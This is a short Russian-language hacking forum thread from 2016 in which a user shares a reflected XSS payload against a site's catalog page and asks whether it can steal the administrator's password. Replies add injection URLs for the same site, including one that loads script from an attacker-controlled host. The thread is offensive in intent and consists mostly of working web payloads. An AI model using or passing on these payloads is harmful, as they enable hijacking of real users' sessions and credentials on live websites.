Вопрос по Xss

Discussion in 'Песочница' started by Sensoft, 13 Apr 2016.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    396
    Likes Received:
    38
    Reputations:
    1
    catalog/?firm=%27"--></style></scRipt><scRipt>alert(0x0001B6)</scRipt>
    В общем такой вопрос что можно сделать с этой Xss ?
    [​IMG]
     
    #1 Sensoft, 13 Apr 2016
  2. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    396
    Likes Received:
    38
    Reputations:
    1
    #2 Sensoft, 13 Apr 2016
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    все то же, что и с другими xss
     
    _________________________
    #3 yarbabin, 13 Apr 2016
  4. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    396
    Likes Received:
    38
    Reputations:
    1
    Можно украсть пароль админа или тип того ?
     
    #4 Sensoft, 13 Apr 2016
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    примерно все то же, что позволяет делать JS
     
    _________________________
    #5 yarbabin, 13 Apr 2016
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,582
    Likes Received:
    1,310
    Reputations:
    1,557
    Там еще image injection
    Code:
    http://site.ru/catalog/?collection=<img src="http://mysite/xxx.jpg" />
    style injection
    Code:
    http://site.ru/catalog/?collection=<link rel="stylesheet" href="http://mysite/xxx.css" />
    И script injection
    Code:
    http://site.ru/catalog/?collection=<script src="http://mysite/xxx.js"></script>
    Короче, ты полностью сломал этот сайт.
     
    #6 M_script, 14 Apr 2016
    Mypa, frank, t0ma5 and 3 others like this.
(You must log in or sign up to post here.)